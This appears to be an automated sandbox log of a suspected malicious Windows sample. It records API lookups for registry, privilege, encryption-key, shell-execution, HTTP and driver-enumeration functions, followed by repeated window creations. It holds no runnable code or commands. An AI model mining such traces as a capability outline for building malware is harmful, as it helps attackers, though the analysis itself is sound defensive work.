Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x74cdd4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MulDiv, address_out = 0x74cc1b80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x74cc588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x74cc110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x74cc3ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x74cc3e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74cc186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x74cdf7aa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74cc34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x770f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74cc7a10 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75570000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextW, address_out = 0x755925cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextA, address_out = 0x7559aea1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x755872c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x75587446 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75591341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75589a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x755878e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x755888f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75591361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x75590eb6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75587809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7558b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x75588332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x755dfd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x755890d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75590dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75588a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75589679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7558787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75593559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x75592320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x7558fc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x755ae061 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x7558b142 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75685689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75684f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x756854f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75685f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetPixel, address_out = 0x7568ccee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectW, address_out = 0x75686c3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetPixel, address_out = 0x7568cbfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetStockObject, address_out = 0x75684eb8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x7568d41c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkColor, address_out = 0x756852d8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x75686001 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75684de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x756858b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x7568b600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextColor, address_out = 0x7568522d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x750e40fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x750e469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x750e14d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x750e4304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x750e0e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x750e0e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x750e431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x750d91ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x750ddf14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x750f77cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x750de124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x750dc532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x750f779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x750d8ee9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x750dc51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x750e46ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x750e468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x750e40e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x750e412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x750e157a True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x758a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x758c0468 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x758b3c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x758c1e46 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x74ee0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x74f1a8c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x74f15d77 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x76b40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x76b5ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x76b64fae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x76b6ba12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x76b6492c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x76b64a42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x76b69197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x76b5b406 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75890000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x758914cc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x75891514 True 1
Fn
Thread 0xa50
255 0
»
Category Operation Information Success Count Logfile
Window Create class_name = #32768, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
